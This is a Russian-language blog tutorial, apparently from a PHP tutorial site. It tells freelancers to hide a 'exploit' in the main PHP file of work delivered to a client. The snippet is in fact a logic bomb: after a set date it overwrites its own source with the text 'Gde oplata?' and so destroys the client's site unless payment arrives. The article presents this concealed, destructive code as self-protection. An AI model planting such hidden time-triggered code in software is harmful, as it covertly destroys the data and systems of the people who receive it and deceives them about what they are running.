Разрабатываем exploit

Сегодня мы разработаем exploit и интегрируем его в свою работу, чтобы защититься от мошенников на фрилансе. Часто бывает, что заказчик требует залить работу без предоплаты сразу на его хостинг. В этом случае рискуете именно вы, но если использовать exploit , то в львиной доле случаев можно себя обезопасить. Неважно во что вы собираетесь интегрировать exploit, будь то плагин WordPress, большой WEB-сайт или даже вёрстка.

В своей работе необходимо найти основной php файл, который вы защитите. Далее в исходном коде нужно найти точку ввода нашего эксплойта. Как правило, это место в коде, без которого сам скрипт работать не будет.

Exploit выглядит следующим образом:

// exploit

if( strtotime('04.09.2018') < time() )
{
    file_put_content(__FILE__, 'Gde oplata?');
}

Это простейший вариант эксплойта, который только может быть. Данный код будет работать ровно до 4 сентября 2018 года. У заказчика до этого момента будет время, чтобы проверить вашу работу и соответственно произвести оплату.

Важно!

Если заказчик не успеет за отведенное время произвести оплату за работу, то есть кинет вас, тогда весь исходный код php файла будет удален, а вместо него встанет надпись «Gde oplata?».

Подробности смотрите в видео

---

Поделиться с друзьями

---

Похожие статьи:

Парсер на PHP с записью контента в БД
Парсер курсов валют на PHP
Удобная форма обратной связи без перезагрузки страницы
Счетчик онлайн посетителей на сайте
Пишем на SQL без SQL: основы по RedBean PHP
Защищенная Авторизация и Регистрация на PHP + MySQL через PDO
Универсальный и очень простой PHP парсер